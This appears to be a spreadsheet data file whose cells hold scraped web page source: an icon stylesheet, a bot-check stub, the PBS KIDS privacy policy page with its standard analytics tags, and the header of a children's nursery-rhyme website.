  .site-icon-reply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g%3E%0D%0A%09%3Cpath%20style%3D%22fill%3A%23bebebb%3B%22%20d%3D%22M20.7%2C20c-0.1%2C0.3-0.3%2C0.7-0.4%2C0.9c-0.1%2C0.1-0.2%2C0.2-0.3%2C0.2c-0.2%2C0-0.4-0.2-0.4-0.4%0D%0A%09%09c0-0.2%2C0-0.4%2C0.1-0.6c0-0.5%2C0.1-1%2C0.1-1.5c0-5.7-3.4-6.7-8.6-6.7H8.4V15c0%2C0.4-0.3%2C0.8-0.8%2C0.8c-0.2%2C0-0.4-0.1-0.5-0.2L1%2C9.4%0D%0A%09%09C0.8%2C9.2%2C0.8%2C9%2C0.8%2C8.8c0-0.2%2C0.1-0.4%2C0.2-0.5l6.1-6.1C7.3%2C2%2C7.5%2C1.9%2C7.7%2C1.9c0.4%2C0%2C0.8%2C0.3%2C0.8%2C0.8v3.1h2.7%0D%0A%09%09c3.9%2C0%2C8.8%2C0.7%2C10.5%2C4.8c0.5%2C1.3%2C0.6%2C2.6%2C0.6%2C4C22.2%2C16.2%2C21.4%2C18.4%2C20.7%2C20z%22%2F%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-remove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path%20style%3D%22fill%3A%23bebebb%3B%22%20d%3D%22M19.6%2C17.5l-6-6l6-6c0.3-0.3%2C0.3-0.8%2C0-1.1l-0.9-0.9c-0.3-0.3-0.8-0.3-1.1%2C0l-6%2C6l-6-6%0D%0A%09c-0.3-0.3-0.8-0.3-1.1%2C0L3.4%2C4.4c-0.3%2C0.3-0.3%2C0.8%2C0%2C1.1l6%2C6l-6%2C6c-0.3%2C0.3-0.3%2C0.8%2C0%2C1.1l0.9%2C0.9c0.3%2C0.3%2C0.8%2C0.3%2C1.1%2C0l6-6l6%2C6%0D%0A%09c0.3%2C0.3%2C0.8%2C0.3%2C1.1%2C0l0.9-0.9C19.9%2C18.3%2C19.9%2C17.8%2C19.6%2C17.5z%22%2F%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-back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path%20style%3D%22fill%3A%23bebebb%3B%22%20d%3D%22M11.5%2C20.9l1-1c0.3-0.3%2C0.3-0.7%2C0-0.9L6%2C12.5h14.6c0.4%2C0%2C0.7-0.3%2C0.7-0.7v-1.3c0-0.4-0.3-0.7-0.7-0.7%0D%0A%09H6l6.5-6.5c0.3-0.3%2C0.3-0.7%2C0-0.9l-1-1c-0.3-0.3-0.7-0.3-0.9%2C0l-9.4%2C9.4c-0.3%2C0.3-0.3%2C0.7%2C0%2C0.9l9.4%2C9.4%0D%0A%09C10.9%2C21.2%2C11.3%2C21.2%2C11.5%2C20.9z%22%2F%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-link {
    background-image: url('data:image/svg+xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE%20svg%20PUBLIC%20%22-%2F%2FW3C%2F%2FDTD%20SVG%201.1%2F%2FEN%22%20%22http%3A%2F%2Fwww.w3.org%2FGraphics%2FSVG%2F1.1%2FDTD%2Fsvg11.dtd%22%3E%0D%0A%3Csvg%20version%3D%221.1%22%20id%3D%22Layer_1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20x%3D%220px%22%20y%3D%220px%22%0D%0A%09%20width%3D%2223px%22%20height%3D%2223px%22%20viewBox%3D%220%200%2023%2023%22%20style%3D%22enable-background%3Anew%200%200%2023%2023%3B%22%20xml%3Aspace%3D%22preserve%22%3E%0D%0A%3Cpath%20style%3D%22fill-rule%3Aevenodd%3Bclip-rule%3Aeve</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;META NAME="robots" CONTENT="noindex,nofollow"&gt;_x005F_x000D_
 &lt;script src="/_Incapsula_Resource?SWJIYLWA=5074a744e2e3d891814e9a2dace20bd4,719d34d31c8e3a6e6fffd425f7e032f3"&gt;_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
&lt;/body&gt;&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;html lang="en"&gt;
&lt;head&gt;
&lt;title&gt;PBS KIDS . Privacy Policy&lt;/title&gt;
&lt;link rel="stylesheet" href="../hybrid/generic.css" type="text/css"&gt;
&lt;style&gt;
body {font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #2d4159;}
a {text-decoration: underline; color: #2d4159;}
a:hover {text-decoration: none; color: #2d4159;}
li {padding: 0 0 15px 0; font-size: 12px;}
h1 {color: white; font-size: 22px;}
h2 {color: white; font-size: 14px;}
/</t>
  </si>
  <si>
    <t>* For the "Information we collect" */
.underline {
  text-decoration: underline; 
}
.pbs-kids-logo {
    background-image: url('../hybrid/hybrid-duallogo-space-yellow.gif');
    display: inline-flex;
    height: 80px;
    width: 94px;
    padding: 10px;
    box-sizing: border-box;
    vertical-align: top;
    justify-content: center;
    align-items: stretch;
    background-repeat: repeat;
}
&lt;/style&gt;
&lt;script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://www-tc.pbskids.org/includes/javascript/bridge.urls.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://www-tc.pbskids.org/includes/javascript/bridge.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body bgcolor="#9EC3EF" background="../hybrid/hybrid-background-lblue.gif" marginheight="0" topmargin="0"&gt;
&lt;!-- Google Tag Manager --&gt; 
&lt;noscript&gt;
  &lt;iframe src="//www.googletagmanager.com/ns.html?id=GTM-MR8JHB" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;
&lt;/noscript&gt; 
&lt;script&gt;
  (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(), event:'gtm.js'});
   var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); 
})(window,document,'script','dataLayer','GTM-MR8JHB');
&lt;/script&gt; 
&lt;!-- End Google Tag Manager --&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Begin comScore Tag --&gt;
 &lt;script&gt;
  var _comscore = _comscore ||</t>
  </si>
  <si>
    <t>[];
  _comscore.push({ c1: "2", c2: "3005420" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
&lt;/script&gt;
&lt;noscript&gt;
  &lt;img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=3005420&amp;cv=2.0&amp;cj=1" /&gt;
&lt;/noscript&gt;
&lt;!-- End comScore Tag --&gt;
  &lt;link rel="stylesheet" type="text/css" href='https://cms-tc.pbskids.org/headband/resources/sass/producer-headband.css' /&gt;
  &lt;div id="headband-container" class='producer-headband '&gt;
    &lt;div class="headband-nav"&gt;
      &lt;ul class="headband-primary-nav"&gt;
        &lt;!-- Do not delete this.</t>
  </si>
  <si>
    <t>This is used for structure and is a
        placeholder if we want to add the newsletter button back. --&gt;
      &lt;/ul&gt;
      &lt;div id="parents-message-bar"&gt;
        &lt;div class="wrap"&gt;
          &lt;div id="parents-messages"&gt;&lt;/div&gt;
        &lt;/div&gt;
        &lt;div class="parents-bar-tooltips"&gt;&lt;/div&gt;
        &lt;button id="squished-headband-toggle"&gt;&lt;span class="hidden"&gt;Toggle message bar&lt;/span&gt;&lt;/button&gt;
      &lt;/div&gt;
      &lt;ul class="headband-supplementary-nav"&gt;
          &lt;li class="nav-item apps"&gt;&lt;a href="/apps"&gt;Apps&lt;/a&gt;&lt;/li&gt;
            &lt;li class="nav-item shop"&gt;&lt;a href="https://shop.pbskids.org/?utm_source=PBS_kids&amp;utm_medium=brandsite&amp;utm_content=ShopButton&amp;utm_campaign=homepage_091914"&gt;Shop&lt;/a&gt;&lt;/li&gt;
            &lt;li class="nav-item parents"&gt;&lt;a href="https://pbskids.org/grownups/"&gt;Parents&lt;/a&gt;&lt;/li&gt;
          &lt;li class="nav-item station" style="display:none;"&gt;&lt;/li&gt;
          &lt;li class="nav-item tv-times" style="display:none;"&gt;
            &lt;a href=""&gt;TV Times&lt;/a&gt;
          &lt;/li&gt;
          &lt;li class="nav-item settings"&gt;
            &lt;button data-action="settings-trigger"&gt;Settings&lt;/button&gt;
          &lt;/li&gt;
      &lt;/ul&gt;
    &lt;/div&gt;
  &lt;/div&gt; &lt;!-- End Headband --&gt;
&lt;script
  type='text/javascript'
  src='https://www-tc.pbskids.org/js/loader/lib/PBS.KIDS.require.js'
  data-main='https://pbskids.org/js/loader/loaders/producers.require.config.js'
&gt;&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>HEADER TABLE START --&gt;
&lt;table width="650" cellpadding="0" cellspacing="0" border="0" align="center"&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="javascript:history.go(-1)"&gt;&lt;img src="../hybrid/hybrid-back-yellow.gif" width="80" height="80" border="0" alt="Back"&gt;&lt;/a&gt;&lt;img src="../hybrid/hybrid-header-privacy-yellow.gif" width="400" height="80" border="0" alt="Privacy Policy"&gt;&lt;img src="../hybrid/hybrid-duallogo-space-yellow.gif" alt=" " width="76" height="80" border="0"&gt;&lt;a class="pbs-kids-logo" href="/"&gt;&lt;img src="https://cms-tc.pbskids.org/globalresources/resources/img/pbs-kids-logo.svg" border="0" alt="PBS Kids logo. "&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;img src="../images/blank.gif" width="650" height="15" border="0" alt=" "&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;!--</t>
  </si>
  <si>
    <t>HEADER TABLE END --&gt;
&lt;div style="width: 575px; margin: 0 auto;"&gt;
    &lt;h1&gt; For Families Visiting PBS KIDS:&lt;/h1&gt;
    &lt;h2&gt;Last modified: May 12, 2020&lt;/h2&gt;
    &lt;p&gt;
    PBS is a nonprofit institution that strives to serve the American public. We value the trust you have placed in us for many years to make quality educational children's content.</t>
  </si>
  <si>
    <t>Sometimes, we may need to collect information about our users and their use of our services to help us achieve that goal.
     &lt;/p&gt;
    &lt;p&gt;
     We are committed to creating a safe and secure environment that family members of all ages can enjoy.</t>
  </si>
  <si>
    <t>We do not collect information that, on its own, directly identifies your child.
     &lt;/p&gt;
    &lt;p&gt;
     This privacy policy ("Privacy Policy") describes how we use, share, and protect information that we collect from you and your child, who may be under the age of 13 or 18, through websites, applications, or online services that PBS KIDS operates or that link to this Privacy Policy (collectively, the "Services").</t>
  </si>
  <si>
    <t>This Privacy Policy applies only to the Services.
     &lt;/p&gt;
    &lt;p&gt;
    Please note that a separate privacy policy may apply to third-party services you use to access our content. Additionally, if we conduct a research study we may do so pursuant to a separate agreement, therefore this Privacy Policy may not govern the processing of information from that research study.</t>
  </si>
  <si>
    <t xml:space="preserve">We strongly encourage you to familiarize yourself not only with this Privacy Policy, but any other privacy policies or agreements that may govern your use of services.
     &lt;/p&gt;
    &lt;h2&gt; What information do we collect?&lt;/h2&gt;
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;Contact information&lt;/span&gt;. 
             We ask parents to provide their email address so they may access certain services, login to OTT devices, see what their child has played and watched on certain Services and/or receive tips about PBS KIDS content.
         &lt;/li&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;User name and password for account creation&lt;/span&gt;.
            </t>
  </si>
  <si>
    <t xml:space="preserve">Neither you nor your child is required to create an account in order to use the Services. However, you may want to do so in order to save your or a child's progress, settings, or content created while using the Services. If you do create an account, we may collect your user name and password.
            </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br/&gt;
            &lt;br/&gt;
            Please note that if you or your child chooses to create an account, you or your child will create a custom username. Usernames are moderated with the aim of preventing you or your child from using any personal information to create an account. Additionally, passwords are encrypted.
        </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;Rough geolocation information&lt;/span&gt;.
             We collect your zip code and other rough information about your location when using the Services, solely to display information for your local PBS station and provide you with localized content.
         &lt;/li&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;Search queries&lt;/span&gt;.
            </t>
  </si>
  <si>
    <t xml:space="preserve">Our Services may include search fields that allow you to search (only within the Services) for content or answers to questions. We collect information about what items and topics you query, and any additional search terms.
         &lt;/li&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;Your content&lt;/span&gt;.
            </t>
  </si>
  <si>
    <t>We collect comments and other information that children post through interactive online features. However, all such information is either canned or moderated to avoid collecting personal information and to help maintain a safe environment for users. Some of our Services allow children to use their device's camera to take photos.</t>
  </si>
  <si>
    <t xml:space="preserve">In most instances, these photos are only able to be stored locally on the device. We do not collect them. In the event that we do allow children to upload photos, such photos are moderated.
        </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;Correspondence you send to us&lt;/span&gt;.
             We may store correspondence with parents related to our Services.
         &lt;/li&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;Information about how our Services are used&lt;/span&gt;.
            </t>
  </si>
  <si>
    <t xml:space="preserve">We may collect information such as preferences, avatars, high scores, connections between friends, what happens in a game, what videos are watched, or pages you view and links you click on within the Services.
         &lt;/li&gt;
        &lt;li&gt;
            &lt;span class="underline"&gt;Device information&lt;/span&gt;.
             We may collect information about your device, including hardware model, operating system version, and unique identifiers.
        </t>
  </si>
  <si>
    <t>&lt;/li&gt;
    &lt;/ul&gt;
&lt;br&gt;
   &lt;h2&gt; We do not collect...&lt;/h2&gt;
   &lt;ul&gt;
       &lt;li&gt;
           Student education records (and therefore PBS KIDS is not subject to the Family Educational Rights and Privacy Act ("FERPA"));
       &lt;/li&gt;
       &lt;li&gt;
           Biometric or health data; 
       &lt;/li&gt;
       &lt;li&gt;
           Information that directly identifies a child (such as name, e-mail address, phone number); or
       &lt;/li&gt;
       &lt;li&gt;
            Personal information of a child, unless we endeavor to obtain a parent or legal guardian's consent or otherwise comply with law. 
        &lt;/li&gt;
   &lt;/ul&gt;
   &lt;br/&gt;
   &lt;h2&gt;</t>
  </si>
  <si>
    <t>We use the information we collect to...&lt;/h2&gt;
   &lt;ul&gt;
       &lt;li&gt;
           Provide local PBS station information including TV schedule;
           &lt;br/&gt;
           Please note that we only use rough geolocation information, such as zip code, as necessary to identify your local station. A user's IP address is stored in a local cookie. Users may be able to disable this cookie using their browser settings.</t>
  </si>
  <si>
    <t xml:space="preserve">Users can also change their local station by manually providing their zip code.
        &lt;/li&gt;
       &lt;li&gt;
            Provide you with other localized content, for instance our PBS KIDS 24/7 channel localized for your PBS station;
       &lt;/li&gt;
       &lt;li&gt;
           To debug, or cap the frequency of, underwriting messages;
       &lt;/li&gt;
       &lt;li&gt;
           Save a child's game state, settings and/or content;
       &lt;/li&gt;
       &lt;li&gt;
           Send parents PBS promotional materials, or other materials related to our services;
       &lt;/li&gt;
       &lt;li&gt;
           Customize the content displayed when a child uses our educational services so that their experience is appropriate for their skill level;
       &lt;/li&gt;
       &lt;li&gt;
           Analyze use of the Services to understand, develop and improve our Services, such as determining which pages are most popular, which browsers are most used, how long users spend on the Services, and from which websites they come;
       &lt;/li&gt;
       &lt;li&gt;
           Otherwise support the internal operations of the Services;
       &lt;/li&gt;
       &lt;li&gt;
           Provide you with notifications pursuant to our legal obligations, including in the case of a data incident;
       &lt;/li&gt;
       &lt;li&gt;
           Prevent potentially prohibited or illegal activities and enforce the &lt;a href="termsofuse.html"&gt;Terms of Use&lt;/a&gt;; and
       &lt;/li&gt;
       &lt;li&gt;
            For any other purposes disclosed to you or your child at the time we collect the information or pursuant to your consent.
       </t>
  </si>
  <si>
    <t>&lt;/li&gt;
   &lt;/ul&gt;
   &lt;p&gt;
    We will not use children's personal information we collect, if any, for marketing or online advertising.
    &lt;/p&gt;
   &lt;br/&gt;
   &lt;h2&gt;</t>
  </si>
  <si>
    <t>Do we share information we collect with any third parties?&lt;/h2&gt;
   &lt;p&gt;
    We may share information that is collected from you or your child as follows:
   &lt;/p&gt;
    &lt;ul&gt;
       &lt;li&gt;
           &lt;span class="underline"&gt;Authorized third-party vendors&lt;/span&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">We may share information with our third-party vendors to help us evaluate, develop and improve the Services, including performing usage analytics and data processing.
        &lt;/li&gt;
       &lt;li&gt;
           &lt;span class="underline"&gt;PBS member stations&lt;/span&gt;. In some circumstances, we may share information with your local PBS member station(s).
       </t>
  </si>
  <si>
    <t>&lt;/li&gt;
       &lt;li&gt;
           &lt;span class="underline"&gt;Business transfers&lt;/span&gt;. We may share information in connection with a substantial business transaction, such as the sale of the Services, a merger, consolidation, asset sale, or in the unlikely event of bankruptcy.
        &lt;/li&gt;
       &lt;li&gt;
           &lt;span class="underline"&gt;Legal purposes&lt;/span&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">We do not rent or sell information to third parties, but we may disclose information to respond to subpoenas, court orders, legal process, law enforcement requests, legal claims or government inquiries, and to protect and defend the rights, interests, property, safety, and security of PBS, our member stations, users, or the public.
        &lt;/li&gt;
       &lt;li&gt;
           &lt;span class="underline"&gt;With your consent&lt;/span&gt;. We otherwise may share your or your child's information with your consent.
       </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
   &lt;/ul&gt;
   &lt;br/&gt;
   &lt;h2&gt;How do we collect information?&lt;/h2&gt;
   &lt;p&gt;
     We may use javascript, cookies, web beacons, Local Shared Objects, and other similar technologies to collect information about your or your child's use of the Services. Local Shared Objects (sometimes referred to as "Adobe Flash cookies") are downloaded to a computer or mobile device by the Adobe Flash media player. 
   </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
   &lt;p&gt;
     We use these technologies for measurement, analytics, and to improve our Services. For example, we use these technologies to help us recognize your or your child's browser as a previous user and save any preferences that may have been set; to help us customize the content shown while you use or your child uses the Services; to provide you or your child with content customized to your interests; to understand whether parents read email messages and click on links contained within those messages, so that we can deliver relevant content and offers; and to help measure and research the effectiveness of our Services. 
   </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
   &lt;p&gt;
     We may allow third parties to place and read their own cookies, web beacons, and similar technologies to collect information through the Services, including to help us with traffic measurement, research, and analytics. We permit these third parties only to collect cookie information and similar identifiers that do not, on their own, directly identify you or your child. 
   </t>
  </si>
  <si>
    <t>&lt;/p&gt;
   &lt;p&gt;
     You may be able to refuse or disable cookies by adjusting your web browser settings. Because each web browser is different, please consult the instructions provided by your web browser (typically in the "help" section).</t>
  </si>
  <si>
    <t xml:space="preserve">Please note that you may need to take additional steps to refuse or disable Local Shared Objects and similar technologies. For example, Local Shared Objects may be controlled through the instructions on Adobe's Setting Manager page. If you choose to refuse, disable, or delete these technologies, some of the functionality of our Services may no longer be available to you or your child.
   </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
   &lt;p&gt;
    Note regarding do-not-track signals and similar mechanisms: Some web browsers transmit "do-not-track" signals to websites. Because of differences in how web browsers incorporate and activate this feature, it is not always clear whether users intend for these signals to be transmitted, or whether they even are aware of them. We currently do not take action in response to these signals.
   </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
   &lt;br/&gt;
   &lt;h2&gt;Does PBS aggregate information? If so, what does PBS do with aggregated information?&lt;/h2&gt;
   &lt;p&gt;
     We may aggregate your or your child's information with information about other users in a way that does not directly identify you or your child.
   </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
   &lt;p&gt;
     We also may share aggregated or de-identified information with third parties, including to help us develop, analyze and improve content and Services. It is possible that the third parties may use this aggregated or de-identified information to develop their own products and service offerings.
   </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
   &lt;br/&gt;
   &lt;h2&gt;Information regarding parental consent, access, and deletion&lt;/h2&gt;
   &lt;p&gt;
     As PBS KIDS does not collect personal information, we are not able to identify your child and therefore are not able to fulfill modification, access, correction, deletion, or portability requests.
    &lt;/p&gt;
   &lt;p&gt;
    </t>
  </si>
  <si>
    <t>If PBS KIDS ever does in the future collect, use or disclose personal information from your child, we will endeavor to obtain a parent or legal guardian's consent before doing so or otherwise comply with law. We will not keep this personal information for longer than necessary.   Parents or legal guardians may also contact us to ask if we have collected their child's personal account information, to review that information, if any, and request that PBS KIDS stop collecting this information and have it deleted.</t>
  </si>
  <si>
    <t>Such requests are subject to PBS KIDS verifying to our satisfaction that the requester is in fact the child's parent or legal guardian.
    &lt;/p&gt;
   &lt;br/&gt;
   &lt;h2&gt;How do we protect information we collect?&lt;/h2&gt;
   &lt;p&gt;
   We are committed to protecting your and your child's information. We have adopted reasonable technical, administrative, and physical procedures to help protect this information from loss, misuse, and alteration, including encryption as appropriate.</t>
  </si>
  <si>
    <t xml:space="preserve">Please note that no data transmission or storage can be guaranteed to be 100% secure. We want you to feel confident using the Services, but we cannot ensure or warrant the security of any information you transmit or your child transmits to us.
    &lt;/p&gt;
   &lt;br/&gt;
   &lt;h2&gt;Notice for international users&lt;/h2&gt;
   &lt;p&gt;
   </t>
  </si>
  <si>
    <t>The Services are designed for and targeted to United States audiences, and are governed by and operated in accordance with the laws of the United States. We make no representation that the Services are operated in accordance with the laws or regulations of any other nations. Information collected through the Services may be stored and processed in the United States or any other country in which we or our service providers maintain facilities.</t>
  </si>
  <si>
    <t>Our service providers may transfer information that we collect about you, including personal information, across borders and from your country or jurisdiction to other countries or jurisdictions, some of which may not have the same data protection laws as your jurisdiction. By using the Services and providing us with information directly or indirectly, you consent to the transfer of information to the U.S. or to any other country in which our service providers maintain facilities for processing by us in accordance with this Privacy Policy.
    &lt;/p&gt;
   &lt;h2&gt;Can PBS make changes to this Privacy Policy?</t>
  </si>
  <si>
    <t xml:space="preserve">Will I be notified?&lt;/h2&gt;
   &lt;p&gt;
    We may revise this Privacy Policy, for example, to reflect changes in the law, our practices, or the features of the Services. We'll notify you before we make any material changes and give you the opportunity to review the revised policy before you choose to continue using our Services.
   </t>
  </si>
  <si>
    <t>&lt;/p&gt;
   &lt;p&gt;
   Non-material changes will be effective immediately upon posting, however we will always note the effective date of such changes at the top of this Privacy Policy. Please periodically review this Privacy Policy so that you are up to date on our most current policies and practices.
    &lt;/p&gt;
   &lt;br/&gt;
   &lt;h2&gt;</t>
  </si>
  <si>
    <t>Do you have any questions about this Privacy Policy?&lt;/h2&gt; 
   &lt;p&gt;If so, please contact us at: &lt;/p&gt; 
    &lt;br&gt;
   &lt;strong&gt;Public Broadcasting Service&lt;/strong&gt;&lt;br&gt;
   1225 S Clark St&lt;br&gt;
   Arlington, VA 22202&lt;br&gt;
   (703) 739-5127&lt;br&gt;
   &lt;a href="mailto:kids@pbs.org"&gt;kids@pbs.org&lt;/a&gt;&lt;/p&gt;
&lt;div class="fineprint" align="center"&gt;
    &lt;a href="/" class="fineprint"&gt;PBS KIDS&lt;/a&gt; |
    &lt;a href="/tvschedules/" class="fineprint"&gt;TV Times&lt;/a&gt; |
    &lt;a href="/help/" class="fineprint"&gt;Help&lt;/a&gt; |
    &lt;a href="/privacy/termsofuse.html" class="fineprint"&gt;Terms of Use&lt;/a&gt;
    &lt;br/&gt;&lt;br/&gt;
    Copyright &amp;copy; 1995-2021 Public Broadcasting Service (PBS).</t>
  </si>
  <si>
    <t xml:space="preserve">All rights reserved.
     &lt;br/&gt;&lt;br/&gt;
&lt;/div&gt;
&lt;div style="display: none;"&gt;
  &lt;div id="sponsor-overlay-content"&gt;
    &lt;a href="" class="image-link sponsor-link"&gt;
      &lt;img class="sponsor-overlay-image" src=""&gt;
    &lt;/a&gt;
    &lt;div class="sponsor-overlay-copy"&gt;
        &lt;h2 class="sponsor-overlay-headline"&gt;&lt;/h2&gt;
        &lt;p class="sponsor-overlay-text"&gt;&lt;/p&gt;
        &lt;a href="" class="sponsor-overlay-button sponsor-link"&gt;&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;script type="text/javascript" src="https://cms-tc.pbskids.org/sponsorship/resources/js/sponsors.js"&gt;&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="https://cms-tc.pbskids.org/sponsorship/resources/css/sponsors.css" media="screen" /&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
_x005F_x000D_
&lt;html lang="en-gb" data-config="{&amp;quot;fixednav&amp;quot;:1,&amp;quot;centerlogo&amp;quot;:1,&amp;quot;twitter&amp;quot;:0,&amp;quot;plusone&amp;quot;:0,&amp;quot;facebook&amp;quot;:0,&amp;quot;style&amp;quot;:&amp;quot;default&amp;quot;}" xmlns:og="http://ogp.me/ns#" slick-uniqueid="3" class="uk-notouch"&gt;	_x005F_x000D_
&lt;head&gt;_x005F_x000D_
  &lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;_x005F_x000D_
  &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;_x005F_x000D_
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;_x005F_x000D_
  &lt;base href=". "&gt;_x005F_x000D_
  &lt;meta name="keywords" content="Dave and Ava - Rediscover nursery rhymes"&gt;_x005F_x000D_
  &lt;meta name="description" content="Dave and Ava - Rediscover nursery rhymes"&gt;_x005F_x000D_
  &lt;meta property="og:description" content="Dave and Ava - Rediscover nursery rhymes"&gt;_x005F_x000D_
  &lt;meta name="generator" content="Joomla! - Open Source Content Management"&gt;_x005F_x000D_
  &lt;meta property="og:description" content="Dave and Ava Nursery Rhymes is a series of 3D animated nursery rhymes especially for young children, ages 1-4. Watch more on our YouTube channel: https://www.youtube.com/DaveAndAva"&gt;_x005F_x000D_
  &lt;meta property="og:title" content="Dave and Ava Nursery Rhymes"&gt;_x005F_x000D_
  &lt;meta property="og:url" content="http://daveandava.com/"&gt;_x005F_x000D_
  &lt;meta property="og:site_name" content="Dave &amp;amp; Ava"&gt;_x005F_x000D_
  &lt;meta property="og:type" content="website"&gt;_x005F_x000D_
  &lt;meta property="og:image" content="images/img04.jpg"&gt;_x005F_x000D_
  _</t>
  </si>
  <si>
    <t>x000D_
  &lt;title&gt;Dave and Ava&lt;/title&gt;_x005F_x000D_
  _x005F_x000D_
  &lt;link href="http://daveandava.com/" rel="canonical"&gt;_x005F_x000D_
  &lt;link href="http://daveandava.com/?format=feed&amp;amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0"&gt;_x005F_x000D_
  &lt;link href="http://daveandava.com/?format=feed&amp;amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0"&gt;_x005F_x000D_
  _x005F_x000D_
  &lt;link href="images/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon"&gt;_x005F_x000D_
	_x005F_x000D_
  &lt;link rel="stylesheet" href="./daveandava_files/bootstrap.css"&gt;_x005F_x000D_
  &lt;link rel="stylesheet" href="./daveandava_files/theme.css"&gt;_x005F_x000D_
   _x005F_x000D_
  &lt;script src="./daveandava_files/mootools-core-uncompressed.js" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="./daveandava_files/jquery.js" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="./daveandava_files/mootools-more-uncompressed.js" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="./daveandava_files/scrolltotop_mt.js" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="./daveandava_files/uikit-5a1b47a8.js" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="./daveandava_files/sticky.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="./daveandava_files/social.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="./daveandava_files/theme.js"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
	_x005F_x000D_
&lt;script type="text/javascript"&gt;_x005F_x000D_
document.addEvent('domready', function() {_x005F_x000D_
	new Skyline_ScrollToTop({_x005F_x000D_
		'image':		'images/scroll-to-top-4.png',_x005F_x000D_
		'text':			'',_x005F_x000D_
		'title':		'',_x005F_x000D_
		'className':	'scrollToTop',_x005F_x000D_
		'duration':		500,_x005F_x000D_
		'transition':	Fx.Transitions.linear_x005F_x000D_
	});_x005F_x000D_
});_x005F_x000D_
jQuery(function($) {_x005F_x000D_
			 $('.hasTip').each(function() {_x005F_x000D_
				var title = $(this).attr('title');_x005F_x000D_
				if (title) {_x005F_x000D_
					var parts = title.split('::', 2);_x005F_x000D_
					$(this).data('tip:title', parts[0]);_x005F_x000D_
					$(this).data('tip:text', parts[1]);_x005F_x000D_
				}_x005F_x000D_
			});_x005F_x000D_
			var JTooltips = new Tips($('.hasTip').get(), {"maxTitleChars": 50,"fixed": false});_x005F_x000D_
		});_x005F_x000D_
  &lt;/script&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;body class="tm-isblog  tm-article-blog tm-content-padding tm-content-boxed"&gt;_x005F_x000D_
